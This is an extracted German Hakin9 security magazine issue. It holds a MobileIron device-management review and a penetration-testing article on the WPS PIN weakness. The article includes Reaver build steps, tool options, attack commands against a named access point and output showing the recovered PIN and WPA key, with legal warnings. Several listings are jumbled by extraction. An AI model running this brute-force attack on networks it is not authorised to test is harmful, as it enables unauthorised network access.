close

Anmelden

Neues Passwort anfordern?

Anmeldung mit OpenID

Hakin9 3/2012 - Security-Finder Schweiz

EinbettenHerunterladen
schuba
sh & höfken
Netzwerke

Konzeption

Analyse

Optimierung

Management

Monitoring
IT-Sicherheit

Firewalls und Intrusion Detection

Sicherer Zugang zum Firmennetz

Einbindung mobiler Geräte

IT-Grundschutz und Notfallhandbuch

Incident Response und Pentesting
IT-Forensik

Live Response

Festplatten- und Dateisystemanalyse

Forensik mobiler Geräte

Netzwerk-Forensik
schuba & höfken
Ahornstr. 16
52074 Aachen
www.schuba-hoefken.de
info@schuba-hoefken.de
Wir sichern IT!
Liebe hakin9 Leser!
das Hauptthema der März Ausgabe ist MobileIron Virtual Smartphone
Management Platform.
Die Menschen gebrauchen immer mehr elektronische Geräte, sowohl beruflich als auch privat. Sind die Geräte wirklich sicher? Wir versuchen das anhand
von unserem Artikel zu erklären.
Immer mehr Consumer-Endgeräte, besonders jene von Apple, werden
zu unerlässlichen Gadgets im beruflichen Umfeld. Zugangsschutz, RemoteLöschung bei Diebstahl und andere Anforderungen lassen sich ohne spezielle
Software jedoch nicht umsetzen. Virtual Smartphone Management Platform von
MbileIron versucht innovativ diese Anforderungen zu erfüllen.
Zu weiteren Highlights der aktuellen Ausgabe gehören: Elementare
Schwächen im Wi-Fi Protected Setup, Internetbetrug, Sicherheitsfalle
Maschinenpark: Anforderungen an Information Security Management steigen,
Access Governance, Google Adwords sind rechtmäßig, Der Einstein-Code,
Maßnahmen konsequent am Wertbeitrag für das Unternehmen ausrichten.
Falls Sie Interesse an einer Kooperation hätten oder Themenvorschläge,
wenden Sie sich bitte an unsere Redaktion.
Viel Spaß mit der Lektüre!
Karolina Sokołowska
5/2009 HAKIN9
4
3/2012
InhaltsverzeIchnIs
TECHNIK
PENETRATION
- TESTING
6 MobileIron Virtual Smartphone
Management Platform
David Rupprechter
Immer mehr Consumer-Endgeräte, besonders jene
von Apple, werden zu unerlässlichen Gadgets im beruflichen Umfeld. Zugangsschutz, Remote-Löschung
bei Diebstahl und andere Anforderungen lassen sich
ohne spezielle Software jedoch nicht umsetzen. Virtual
Smartphone Management Platform von MbileIron versucht innovativ diese Anforderungen zu erfüllen.
12 Elementare Schwächen
im Wi-Fi Protected Setup (WPS)
...und weshalb die Abkürzung „WPS“ eigentlich „Wi-Fi Precarious Setup“ lauten müsste.
Andreas G. Weyert
Bei Wi-Fi Protected Setup (WPS) handelt es sich um einen von dem Industriekonsortium Wi-Fi Alliance entwickelten und im Jahre 2007 vorgestellten Standard zum
einfachen Aufbau eines drahtlosen Heimnetzwerks mit
Verschlüsselung. Das Ziel von WPS ist es, die Integration von Geräten in ein bestehendes WLAN zu vereinfachen, nachdem die Einrichtung einer adäquaten
Verschlüsselung durch Eingabe eines 60-stelligen PreShared-Keys - z.B. bei WPA2 - von vielen als umständlich empfunden wird. Beiliegender Artikel beschreibt
die im Dezember 2011 durch Stefan Viehböck veröffentlichte Schwäche von WPS und demonstriert deren
Exploitation anhand eines konkreten Beispiels.
INTERNETSICHERHEIT
19 Sich vor Internetbetrug schützen
Sascha Sollnberger
Leider ist das Thema Cybercrime heute keine Ausnahme mehr. Laut des Bundeskriminalamts sind im Jahr
2010 die registrierten Schäden im Internet im Vergleich
zu 2009 um 66 Prozent gestiegen.
Produktion: Andrzej Kuca
DTP: Przemysław Banasiewicz
herausgegeben vom Verlag:
Umschlagsentwurf: Przemysław Banasiewicz
kenzeichen, Logos und Handelsmarken, die
sich in der Zeitschrift befinden, sind registrierte oder nicht-registrierte Markenzeichen
der jeweiligen Eigenümer und dienen nur als
inhaltliche Ergänzungen.
Software Press Sp. z o. o. SK
Geschäftsführer: Paweł Marciniak
Managing Director: Justyna Książek
justyna.ksiazek@software.com.pl
Chefredakteurin: Karolina Sokołowska
karolina.sokolowska@software.com.pl
Redaktionsassistentin: Ewa Strzelczyk
ewa.strzelczyk@software.com.pl
Redaktion: David Rupprechter, Andreas G.
Weyert, Sascha Sollnberger, Gerald Spiegel,
Marco Rohrer, Felix Barth, Jürgen T. Knauf,
Prof. Dr. Rudolf Dögl und Michael Jost, Marcin Pietrzak
4
Werbung: adv@software.com.pl
Anschrift:
Software Press Sp. z o.o. SK
ul. Bokserska 1, 02-682 Warszawa, Poland
Tel. +48 22 427 36 56, Fax +48 22 244 24 59
www.hakin9.org/de
Die Redaktion bemüht sich, dafür Sorge zu
tragen, dass die in der Zeitschrift sowie auf
den begleitenden Datenträgern erhaltenen
Informationen und Anwendungen zutreffend
und funktionsfähig sind, übernimmt jedoch
keinerlei Gewähr für derer Geeignetheit für
bestimmte Verwendungszwecke. Alle Mar-
Anmerkung!
Die in der Zeitschrift demonstrierten Techniken sind AUSSCHLIEßLICH in eigenen
Rechnernetzen zu testen! Die Redaktion
übernimmt keine Haftung für eventuelle
Schäden oder Konsequenzen, die aus der
unangemessenen Anwendung der beschriebenen Techniken entstehen. Die Anwendung
der dargestellten Techniken kann auch zum
Datenverlust führen!
hakin9 erscheint in folgenden Sprachversionen
und Ländern: deutsche Version (Deutschland,
Schweiz, Österreich, Luxemburg), polnische
Version (Polen), englische Version (Kanada, USA)
6/2010
Inhaltsverzeichnis
INFORMATIONSSCIHERHEIT
UNTERNEHMENSSICHERHEIT
22 Sicherheitsfalle Maschinenpark:
Anforderungen an Information Security Management steigen
34 Der Einstein-Code: Echte
Leader braucht das Land
Gerald Spiegel, Steria Mummert Consulting
Vernetztes Arbeiten im Business-Alltag geht längst
über das virtuelle Arbeiten mit mobilen Geräten und
den Zugriff auf Firmennetzwerke hinaus. Industrieunternehmen steuern heute ganze Maschinen- und Anlagenparks sowie technische Prozesse per Mausklick.
Möglich wird das durch die Anbindung so genannter
SCADA-Systeme (Supervisory Control and Data Acquisition) an die Unternehmens-IT. Dadurch entstehen
allerdings gleichzeitig neue Angriffsflächen für Hacker.
Unternehmen sind gefordert, ihre Sicherheitsvorkehrungen auszudehnen. Ein Information Security Management System (ISMS) auf Basis von ISO 27001
stellt dabei einen praxisbewährten Lösungsweg dar.
DATENSICHERHEIT
25 Wirksame Sicherheit durch Optimierung
des Zugriffsschutzes
Access Governance – IAM der Neuzeit
Marco Rohrer, Experte IAM
Mehr Risiken erfordern höhere Sicherheiten für Informationen und Daten. Aber wie? Die zunehmende Sensibilisierung der Sicherheitsverantwortlichen führt dazu, dass
sich diese verstärkt mit der Frage beschäftigen „wer kann
wie auf welche Informationen zugreifen?“ Damit der Zugriff auf die Unternehmensressourcen sicher ist, sind unterschiedliche Themen für eine umfassende Lösungsgestaltung möglich. Ein aktuelles und hoch wirksames ist
Access Governance und bedeutet eine strukturierte Kontrolle und Überprüfung von Mitarbeiter-Berechtigungen.
Jürgen T. Knauf
Schlecker ist pleite, der Konkurrent dm – drogeriemarkt
– floriert. Und warum? Weil echter Erfolg nur möglich
ist, wenn man ganzheitlich denkt. Der Mensch macht
den Unterschied: keine Wertschöpfung ohne Wertschätzung!
38 Maßnahmen konsequent am Wertbeitrag
für das Unternehmen ausrichten
Die richtige Priorisierung schafft Wettbewerbsvorteile und erleichtert das Tagesgeschäft
Prof. Dr. Rudolf Dögl und Michael Jost
Um eine Ausrichtung der Maßnahmen auf die Strategie und eine Vergleichbarkeit zu erreichen, ist eine
standardisierte Methode sowie eine eindeutige Bewertungsgrundlage Voraussetzung. Dabei ist es wichtig,
typische Fehler zu vermeiden: Eine reine Kostenbetrachtung (ROI), bei der andere unternehmenskritische
Aspekte (Passung zur Strategie, Zeit, Qualität, Kundennutzen, Wettbewerb…) außen vor bleiben. Eine
Verdichtung auf eine Kennzahl eliminiert das unternehmerisches „Gefühl“, Erfahrungen fließen nicht mit ein.
IT-RECHT
30 Das EuGH-Urteil – Google
Adwords sind rechtmäßig!
Felix Barth
Adwords beschäftigen die Rechtsexperten schon seit geraumer Zeit. Vor den Gerichten streiten Unternehmen darüber, ob die Verwendung einer fremden Marke als Adword
eine Markenrechtsverletzung darstellt. Nun hat der EuGH
ein entscheidendes Urteil gefällt. Dazu gab es im Internet
bereits erste Kommentare – viele sind jedoch viel zu undifferenziert. Die IT-Recht Kanzlei liefert detaillierte Informationen über das Urteil des EuGH: was hat das Gericht gesagt und was bedeutet das Urteil für die Werbetreibenden?
hakin9.org/de
Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem
deutschen Recht stattgefunden haben und die IT-Sicherheit betreffen, möchten wir ankündigen, dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt.
Unser Magazin dient ausschließlich den Erkenntniszwecken.
Alle im Magazin präsentierten Methoden sollen für eine sichere IT
fungieren. Wir legen einen großen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Bekämpfung von IT Kriminalität.
5
technik
MobileIron Virtual Smartphone
Management Platform
David Rupprechter
Immer mehr Consumer-Endgeräte, besonders jene von Apple,
werden zu unerlässlichen Gadgets im beruflichen Umfeld.
Zugangsschutz, Remote-Löschung bei Diebstahl und andere
Anforderungen lassen sich ohne spezielle Software jedoch
nicht umsetzen. Virtual Smartphone Management Platform von
MbileIron versucht innovativ diese Anforderungen zu erfüllen.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Funktionen, welche Virtual Smartphone Management Platform von MobileIron bietet um die Verwaltung mobiler Endgeräte zu verbessern und Richtlinien durchzusetzen“
• Grundlegende Erfahrung mit Smartphones oder anderen mobilen Endgeräten.
• Allgemeine VMware ESX- und Netzwerkkenntnisse
Virtual Smartphone Management Platform
Die Firma Mobile Iron wurde 2007 gegründet und hat
ihren Sitz in Kalifornien. 33 Techniker bemühen Smartphones Enterprise-Ready zu machen. Hierfür bietet die
Firma das Produkt „Virtual Smartphone Management
Platform“ (kurz VSP) an. Dieses steht als Appliance
oder als ESX-Image zur Verfügung. Der Vorteil der virtualisierten Variante besteht in der Ausfallsicherheit, da
in Zusammenspiel mit VMware HA und redundanten
ESX-Server so eine Hochverfügbarkeit gewährleistet
werden kann. Bei Ausfall einer Appliance wäre bis zum
Austausch keine Verbindung der mobilen Endgeräte
Abbildung 1. Lockdown-Policy Unterstützung mobiler Endgeräte
6
3/2012
MobileIron Virtual Smartphone Management Platform
zum Exchange-Server verfügbar. Die Plattform besteht
aus zwei Systemen. Beide Systeme basieren auf Linux
und lassen sich nach der kurzen Grundkonfiguration
(Hostname, IP, Gateway,…) bequem per Webinterface
administrieren.
Integration in das Firmennetzwerk
Die Plattform besteht aus einem Sentry-System, welches Exchange-ActiveSync-Inhalte über Port 443 zur
Verfügung stellt und dem VSP-System, welches für Registrierung, Konfigurationsmanagement, Apps usw. zuständig ist. Beide Systeme, welche auf Linux basieren,
sind in der DMZ zu positionieren. Die Installation erfolgt
bei der virtuellen Appliance nach dem Import auf den
ESX-Server über die Konsole und dauert nur wenige
Minuten.
Die Sentry Appliance erfüllt den Zweck eines Reverse Proxies und stellt Exchange-ActiveSync-Dienste bereit. So erhält man einen eigenen ActiveSync-Pfad für
mobile Endgeräte. Der Zugriff auf diesen Kommunikationspfad lässt sich beim Verstoß gegen Firmenrichtlinien deaktivieren oder zum Beispiel nur für bestimmte
verwaltete Geräte aktivieren. Dadurch ergibt sich auch
die Möglichkeit Outlook Web Access (OWA), falls nur
für mobile Endgeräte benötigt, generell zu deaktivieren.
Bis dato wurde OWA für einen Großteil der Smartpho-
nes (exkl. Blackberry) benötigt um eben jene an Exchange anzubinden.
Nach der Basisinstallation ist eine Konfiguration über
das Webinterface vorzunehmen. Im Hauptpunkt „Settings“ sind Interfaces, Routen und DNS zu überprüfen und
gegebenenfalls anzupassen. Aufgrund der späteren Verwendung von Zertifikaten ist ein NTP-Server ebenfalls zu
hinterlegen. Ein weiterer benötigter Schritt ist die Hinterlegung eines Mailservers. Optional können für die Überwachung der Plattform SNMP- oder Syslog-Server definiert
werden. Bei Bedarf können die Standard-Ports (Sync-,
Helpdesk- und Provisioningports) geändert werden.
In der Registerkarte „Security“ können Zertifikate und
lokale Benutzer verwaltet werden. Ebenso können hier
über Access Control Lists (ACL´s) die Schnittstellen
des Systems nur für bestimmte IP-Bereiche/… geöffnet
werden.
Andere benötigte Anpassungen und die Verwaltung
von Smartphones kann über die Smartphone-Management-Seite durchgeführt werden. Der Wechsel zwischen dem System- und Smartphone-Management
erfolgt ein wenig versteckt mit einem Klick auf „Smartphone“ oder „System“ rechts neben dem MobileIron Logo.
Das Smartphone-Management beinhaltet eine
„Settings“-Seite auf welcher man die LDAP-Anbindung
Abbildung 2. Sync-Policy Unterstützung mobiler Endgeräte
hakin9.org/de
7
technik
oder zum Beispiel einen optional bestehenden Blackberry-Enterprise-Server hinterlegen kann. Ebenso
werden hier Sicherheitseinstellungen für die Registrierung von iOS/Android-Geräten verwaltet. Die SentryAppliance ist unter „Settings“ -> „Sentry“ zu hinterlegen.
Abbildung 6 zeigt die Positionierung der beiden Appliances im Firmennetzwerk. Die entsprechenden Ports
(eingehend, ausgehend) müssen auf der Firewall freigeschaltet werden um einen ordnungsgemäßen Betrieb
gewährleisten zu können.
ne SMS mit Instruktionen um den Registrierungsvorgang abzuschließen. Hierfür ist der MobileIron-Client
auf dem Gerät herunterzuladen (zB im Apple AppStore
verfügbar). Den Status des jeweiligen Geräts kann man
im Webinterface unter „Smartphones & Users“ -> „All
Smartphones“ überprüfen. Für jedes Gerät werden alle
relevanten Informationen aufgelistet. Dazu zählen verfügbarer Speicherplatz, installierte Apps, Version des
Smartphone-OS usw.
Initialer Rollout von Endgeräten
Es werden eine große Anzahl von Endgeräten unterstützt (iOS-Geräte, Blackberry, Windows Mobil 5.x und
6.x, Symbian, Android und Palm webOS). Zahlreiche
Für den Rollout wird das jeweilige Gerät über das Webinterface registriert. Daraufhin erhält der Benutzer ei-
Unterstütze Endgeräte und
Policies/App Settings und Labels
Abbildung 3. Privacy-Policy Unterstützung mobiler Endgeräte
Abbildung 4. Backup&Restore-Policy Unterstützung mobiler Endgeräte
8
3/2012
MobileIron Virtual Smartphone Management Platform
Policies können jedoch nur auf die unterstützen Endgeräte angewendet werden.
Es gibt vier verschiedene Arten von Policy-Gruppen:
•
•
•
•
Lockdown-Policy (Kamera, Wifi,…)
Sync-Policy (Batterie, Roaming, TLS,…)
Privacy-Policy (Anrufe, SMS, Apps,…)
Backup & Restore Policy
Es sieht so aus als würden iOS-Geräte (Apple-Geräte) kaum eine gute Unterstützung finden. Diese Geräte
können jedoch über die iOS App-Settings, zu finden in
der Karte „App & Files“ (siehe Abbildung 5), ausgiebig
verwaltet werden.
Unter anderem können folgende Device Features für
iOS-Geräte deaktiviert/aktiviert werden:
•
•
•
•
•
Installation von Apps
Benutzung der Kamera
Benutzung von Youtube
Benutzung von Safari
Benutzung von iCloud
Zusätzlich können Exchange- und Mailzugänge, Wifiund VPN-Verbindungen sowie Bookmarks und Zertifikate innerhalb der App Settings für alle Geräte geregelt werden.
Wie in Auflistung eins bis vier zu sehen werden die
jeweiligen Policy-Features nur von bestimmten Geräten
unterstützt. Sehr gute Unterstützung finden vor Allem
Blackberry (bis auf Lockdown-Policy), Windows Mobi-
le und Symbian-Geräte. Bis auf die Privacy- und Backup-Richtlinien können auf Android-Geräte ebenfalls alle
restlichen Policies angewendet werden.
Über die Funktion „App Control“ lassen sich nicht erwünschte/benötigte/erlaubte Apps definieren. Bei einem Verstoß gegen Richtlinien werden je nach Einstellung Warnungen an den Benutzer versendet oder die
Exchange-Synchronisation deaktiviert. Zusätzlich können noch weitere Aktionen manuell definiert werden.
Über den Punkt „App Distribution“ lassen sich Apps
in eine Favoritenliste hinzufügen um diese den Benutzern auf dem Endgeräten bereitzustellen. Das beziehen
dieser Apps erfolgt jedoch mit dem eigenem iTunes/
Google/…-Account. Auf iOS-Geräten lassen sich, mit
Hilfe des iOS Volume Purchase Program (VPP) Apps
im Voraus bezahlen. Hierfür kann die jeweilige VPPDatei der jeweiligen App in „App Distribution“ hinterlegt
werden. Somit entstehen für den Endnutzer keine Kosten mehr.
Alle Policies lassen sich bestimmten Labels zuweisen. Vordefinierte Labels sind zum Beispiel „Employee-Owned“ oder „Company-Owned“. Geräte können
mehreren Labels zugeordnet werden. Kommt es hier
zu Konflikten kommt das als vorranging definierte Label
zum Einsatz.
Wie in den Abbildungen eins bis fünf zu sehen bietet
das Produkt viele Möglichkeiten zur Verwaltung mobiler
Endgeräte. Eine detaillierte Besprechung aller Optionen
würde den Rahmen dieses Artikels sprengen. Einige
von Firmen eventuell benötigte Features fehlen jedoch.
Ein Beispiel hierfür wäre zum Beispiel die Möglichkeit
Abbildung 5. Die iOS-App-Settings und deren Möglichkeiten
hakin9.org/de
9
technik
Abbildung 6. Positionierung von VSP und Sentry im Firmennetzwerk
die Hinterlegung von zusätzlichen Online-Konten in der
App Goodreader (Google-Docs/Dropbox-Anbindung)
zu unterbinden. Derartige Einschränkungen sind leider,
zumindest in der jetzigen Version, nicht umsetzbar.
Apple MDM Architektur
Um iOS-Geräte per MobileIron VSP verwalten zu können wird Apple MDM (Mobile Device Management) verwendet. Hierbei wird von Apple das „Apple Push Notification Service“ (APNs) verwendet, welches ein von
Apple signiertes Zertifikat für die Benutzung benötigt.
Über die Registerkarte „Settings“ in der SmartphonesVerwaltung kann man hierfür unter „MDM Preferences“
einen Zertifikatsrequest erstellen und diesen in einem
zweiten Schritt über das Apple Push Certificates Portal
signieren zu lassen um zuletzt das erhaltene MDM Zertifikat auf das VSP-System zu importieren.
Im Internet
•
•
•
10
https://mobileiron.zendesk.com/home - MobileIron Support Portal
http://www.youtube.com/user/mobileiron?blend=2&ob=video-mustangbase – MobileIron Youtube Channel
http://cysalesteam.com/mobileiron - MobileIron University
Fazit
Die Virtual Smartphone Platform bietet zahlreiche Möglichkeiten zur Verwaltung von mobilen Endgeräten. Features wie Remote-Wipe, die Verteilung von VPN- und
Wifi-Profilen oder das einheitliche Setzen von Smartphone-Einstellungen überzeugen und sparen dem Administrator viel Zeit. Zusätzlich kann die Exchange-Synchronisation auf Basis von Geräten und Einhaltung von
Regeln erlaubt/gesperrt werden. Bei Interesse an den
Möglichkeiten des Produkts bietet sich eine Beantragung einer Testversion an um zusätzliche Einstellungsmöglichkeiten, welche im Rahmen diesen Artikels nicht
erwähnt wurden, zu erforschen.
David Rupprechter
Der Autor beschäftigt sich mit Windows/Linux/Virtualisierung/Sicherheit seit vielen Jahren. Auf der privaten Webseite
www.dotlike.net sind Projekte und Artikel von ihm zu finden.
Kontakt mit dem Autor:
rupprechter@dotlike.net
3/2012
PENETRATIONTESTING
Elementare Schwächen im Wi-Fi Protected Setup (WPS)
...und weshalb die Abkürzung „WPS“ eigentlich „Wi-Fi Precarious Setup“
lauten müsste.
Andreas G. Weyert
Bei Wi-Fi Protected Setup (WPS) handelt es sich um einen von dem
Industriekonsortium Wi-Fi Alliance entwickelten und im Jahre 2007
vorgestellten Standard zum einfachen Aufbau eines drahtlosen
Heimnetzwerks mit Verschlüsselung. Das Ziel von WPS ist es, die
Integration von Geräten in ein bestehendes WLAN zu vereinfachen,
nachdem die Einrichtung einer adäquaten Verschlüsselung durch
Eingabe eines 60-stelligen Pre-Shared-Keys - z.B. bei WPA2 - von
vielen als umständlich empfunden wird.
In diesem Artikel erfahren Sie…
Was Sie vorher wissen sollten…
• Vorstellung der WPS-Schwäche
• Vorstellung der Installation des Reaver WiFi Protected Setup
Attack Tool
• Vorstellung der Bedienung des Reaver WiFi Protected Setup
Attack Tool
• Grundkenntnisse über WLAN
• Grundkenntnisse über GNU/Linux
B
eiliegender Artikel beschreibt die im Dezember 2011 durch Stefan Viehböck veröffentlichte
Schwäche von WPS und demonstriert deren Exploitation anhand eines konkreten Beispiels.
Kurz vor Silvester letzten Jahres sind durch die
Veröffentlichung des Studenten Stefan Viehböck all
jene bestätigt worden, die Industriestandards nur
mit äußerster Skepsis gegenübertreten: Nachdem
das angeblich als sicher angepriesene StandardVerschlüsselungsprotokoll Wired Equivalent Privacy (WEP) bereits im Jahre 2003 durch eklatante
Schwachstellen bloßgestellt wurde und mittlerweile
binnen 60 Sekunden auszuhebeln ist, folgte Ende
2011 die Kompromittierung des zum einfachen Aufbau eines drahtlosen Heimnetzwerks mit Verschlüsselung entwickelten Standards „Wi-Fi Protected Setup“ (WPS).
Abbildung 1. Logo Wi-Fi Protected Setup (Wi-Fi Alliance)
12
WPS wurde im Jahre 2007 durch die Wi-Fi Alliance
als vereinfachte, sichere Konfiguration von Funknetzen
ausgearbeitet. Ziel sollte sein, die bisherige Eingabe eines Pre-Shared-Keys zu vereinfachen und alternativ
über einen Knopfdruck am Router oder einer vorgegebenen PIN das als sicher erachtete Verschlüsselungsverfahren WPA/WPA2 einzurichten. Die einfachste
Form der Konfiguration, eine dem Gerät beigefügte und
oftmals aufgeklebte 8-stellige PIN, die im Client einzugeben ist, entwickelt sich jetzt für die Wi-Fi Alliance zum
Waterloo, stellt diese doch das Einfallstor der WPSSchwäche dar.
Abbildung 2. Einer der vielen anfälligen WLAN-Router, hier der
Linksys E1000
3/2012
Elementare Schwächen im Wi-Fi Protected Setup (WPS)
Listing 1. Kompilierung Reaver
-e, --essid=<ssid>
ESSID of the target AP
-c, --channel=<channel>
Set the 802.11
channel for the interface (implies
root@discordia:/home/andreas/lab/wpscrack_wps-Reaver# cd
-f)
reaver-1.3
root@discordia:/home/andreas/reaver-1.3# ls -l
-o, --out-file=<file>
Send output to a log
-s, --session=<file>
Restore a previous
-a, --auto
-f, --fixed
-5, --5ghz
file [stdout]
total 8
drwxr-xr-x 2 postgres postgres 4096 2011-12-30 00:25 docs
drwxr-xr-x 9 postgres postgres 4096 2011-12-30 00:25 src
root@discordia:/home/andreas/reaver-1.3# cd src/
root@discordia:/home/andreas/reaver-1.3/src# ./configure
checking for gcc... gcc
checking for suffix of executables...
checking whether we are cross compiling... no
Auto detect the best
advanced options for the target AP
Disable channel
hopping
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
session file
Use 5GHz 802.11
channels
-v, --verbose
Display non-critical
warnings (-vv for more)
(...)
-q, --quiet
-h, --help
messages
root@discordia:/home/andreas/reaver-1.3/src# make
(cd utils && make)
Only display critical
Show help
make[1]: Entering directory `/home/andreas/reaver-1.3/
Advanced Options:
src/utils'
CC
base64.c
CC
common.c
CC
ip_addr.c
-p, --pin=<wps pin>
-d, --delay=<seconds>
8 digit WPS pin
-l, --lock-delay=<seconds>
if [ ! -d /etc/reaver ]; then mkdir /etc/reaver; fi
cp reaver.db /etc/reaver/reaver.db
if [ -e walsh ]; then cp walsh /usr/local/bin/walsh; fi
if [ -e reaver ]; then cp reaver /usr/local/bin/reaver; fi
if [ ! -e /usr/bin/walsh ]; then ln -s /usr/local/bin/
[315]
-g, --max-attempts=<num>
Quit after num pin
attempts
-x, --fail-wait=<seconds>
Set the time to sleep
after 10 unexpected failures [0]
walsh /usr/bin/walsh; fi
-r, --recurring-delay=<x:y>
reaver /usr/bin/reaver; fi
-t, --timeout=<seconds>
Set the receive
-T, --m57-timeout=<seconds>
Set the M5/M7 timeout
if [ ! -e /usr/bin/reaver ]; then ln -s /usr/local/bin/
Listing 2. Parameter von Reaver
timeout period [5]
period [0.20]
-S, --dh-small
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig
-L, --ignore-locks
Name of the monitor-
mode interface to use
Ignore locked state
reported by the target AP
-E, --eap-terminate
Terminate each WPS
-n, --nack
Target AP always
-w, --win7
Heffner <cheffner@tacnetsol.com>
-i, --interface=<wlan>
Use small DH keys to
improve crack speed
root@discordia:/home/andreas/reaver-1.3/src# ./reaver
Required Arguments:
Sleep for y seconds
every x pin attempts
root@discordia:/home/andreas/reaver-1.3/src#
-b, --bssid=<mac>
Set the time to wait
if the AP locks WPS pin attempts
root@discordia:/home/andreas/reaver-1.3/src# make install
Set the delay between
pin attempts [1]
(...)
Use the specified 4 or
session with an EAP FAIL packet
sends a NACK [Auto]
Mimic a Windows 7
registrar [False]
BSSID of the target AP
Example:
Optional Arguments:
-m, --mac=<mac>
MAC of the host
system
hakin9.org/de
./reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
root@discordia:/home/andreas/reaver-1.3/src#
13
PENETRATIONTESTING
Im Idealfall bietet eine achtstellige Zahl genau 10^8
(100.000.000) verschiedene Kombinationsmöglichkeiten, eine für heutige Maßstäbe recht hohe Zahl.
Bei einer fehlgeschlagenen WPS-Zertifizierung meldet der WLAN-Router allerdings nicht nur den Fehler,
sondern lässt den Angreifer auch erkennen, welche
Hälfte der Zahlenkombination falsch war. Dadurch
werden die Versuche zum Erraten der richtigen PIN
erheblich reduziert. Da die achte Ziffer eine Prüfsumme der vorhergehenden sieben Ziffern ist, verringert
sich die Zahl der benötigten Versuche nochmals auf
nur noch 10^4 + 10^3 (11.000). Ist die 8-stellige PIN
erst ermittelt, lässt sich der Pre-Shared-Key ausfindig
machen, über den man sich anschließend – natürlich
auch unberechtigterweise – in ein WLAN einbuchen
kann.
Abbildung 3. Reaver WiFi Protected Setup Attack Tool
Abbildung 4. airmon-zc start wlan1
14
3/2012
Elementare Schwächen im Wi-Fi Protected Setup (WPS)
Neben dem von Stefan Viehböck in Python entwickelte „wpscrack“ gibt es eine seitens Craig Heffner von
Tactical Network Solutions aus Maryland veröffentlichte
Open-Source-Software namens „Reaver“, anhand derer wir die WPS-Schwäche an einem konkreten Beispiel
verdeutlichen werden.
Zunächst gilt es den Quelltext von „Reaver“ bei
Google Code herunterzuladen und den komprimierten Tarball zu entpacken. Die Kompilierung der
Sourcen erfolgt – vorausgesetzt, die Bibliotheken
libpcap und libsqlite3 sind bereits eingebunden – im
üblichen Linux-Dreischritt mit ./configure – make –
make install
Beim Start präsentiert sich „Reaver“ mit folgendem
Bild (Abbildung 3).
Die im Folgenden durchzuführenden Schritte gestalten sich wie folgt:
• Schaltung der WLAN-Karte in den Monitoring-Mode
• Ermittlung der in Reichweite befindlichen WLANRouter oder Access Points
Abbildung 5. airodump-ng wlan1
Abbildung 6. Wi-Fi Protected Setup sollte unbedingt deaktiviert werden
hakin9.org/de
15
PENETRATIONTESTING
• Durchführung des Brute Force Angriffs durch das
Reaver WiFi Protected Setup Attack Tool
Vor dem erfolgreichen Einsatz schalten wir mit „airmon-ng“ oder „airmon-zc“ aus der Aircrack-Suite die
WLAN-Karte in den Monitoring-Mode (in diesem Beispiel durch „airmon-zc start wlan1“) um anschließend mit „airodump-ng“ die in Reichweite befindlichen
Funknetze zu ermitteln (in diesem Beispiel durch „airodump-ng wlan1“).
Die ESSID „SUNBRST-Office-WLAN“ in unmittelbarer Nähe könnte sich als lukratives Ziel erweisen. Wir
vermerken die BSSID und den Kanal, um anschließend „Reaver“ durch den Befehl „reaver -i mon0 -c
7 -b 00:22:6B:70:1E:FE -vv“ im Rahmen eines Brute
Force Angriffs auf die WiFi Protected Setup PIN des
erwähnten Access Points anzusetzen. Die Kanalangabe ist nicht unbedingt erforderlich, zumal „Reaver“ in
der Lage ist, eigenständig den richtigen Kanal zu idenListing 3. Reaver im Einsatz...
root@discordia:~# reaver -i mon0 -c 7 -b
Fazit:
Es bleibt festzuhalten, dass seit Jahren fast alle
WLAN-Router mit aktiviertem WPS ausgeliefert werden. Angesichts der Tatsache, dass viele Geräte von
der Sicherheitslücke betroffen sind und kaum Gegenmaßnahmen gegen einen solchen Brute Force
reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting
last message
00:22:6B:70:1E:FE -vv
(...)
Reaver v1.3 WiFi Protected Setup Attack Tool
[+] Trying pin 32768374
Heffner <cheffner@tacnetsol.com>
[+] Trying pin 32768381
Copyright (c) 2011, Tactical Network Solutions, Craig
[+] Waiting for beacon from 00:22:6B:70:1E:FE
[+] Switching mon0 to channel 7
[+] Associated with 00:22:6B:70:1E:FE (ESSID: SUNBRST-
[+] Trying pin 32768817
[+] Trying pin 32763027
[+] Trying pin 32769692
[+] 96.75% complete @ 2012-02-12 15:04:39 (3 seconds/
attempt)
Office-WLAN)
[+] Trying pin 32768800
[!] WARNING: Last message not processed properly,
[+] Trying pin 32761344
[+] Trying pin 38836275
reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting
[+] Trying pin 32769739
[+] Trying pin 32763812
[+] Trying pin 32766493
last message
[+] 96.80% complete @ 2012-02-12 15:04:54 (3 seconds/
[+] Trying pin 38836275
attempt)
reverting state to previous message
[+] Trying pin 32766295
[!] WARNING: Last message not processed properly,
[+] Trying pin 32766899
[!] WARNING: Out of order packet received, re-trasmitting
[+] Trying pin 32762877
last message
[+] Trying pin 38836275
[+] Trying pin 04796275
[+] Trying pin 32767704
[+] Trying pin 32766448
[+] 96.85% complete @ 2012-02-12 15:05:10 (3 seconds/
[+] Trying pin 88156279
attempt)
[+] 0.04% complete @ 2012-02-12 11:26:45 (4 seconds/
[+] Trying pin 32764284
[+] Trying pin 08136275
attempt)
[+] Trying pin 12336272
[!] WARNING: Receive timeout occurred
[+] Trying pin 12336272
[!] WARNING: Receive timeout occurred
[!] WARNING: Last message not processed properly,
16
tifizieren.
Keine 3 ½ Stunden später ist die 8-stellige WPS-PIN
nebst WPA-PSK ermittelt, einer Anmeldung am WLAN
steht somit nichts mehr im Wege.
An dieser Stelle erfolgt sicherheitshalber der Verweis auf den „Hackerparagraphen“ § 202c des deutschen Strafgesetzbuches (StGB), der das Vorbereiten
des Ausspähens und Abfangens von Daten unter Strafe
stellt. Die Ermittlung von Passwörtern oder sonstiger Sicherungscodes, die den Zugang zu Daten ermöglichen,
ist somit nur mit eigenem Equipment oder z.B. im Auftrag des Kunden erlaubt.
[+] Trying pin 32761023
[+] Trying pin 32763906
[+] Key cracked in 13132 seconds
[+] WPS PIN: '32763906'
[+] WPA PSK: '32763906'
[+] AP SSID: 'SUNBRST-Office-WLAN'
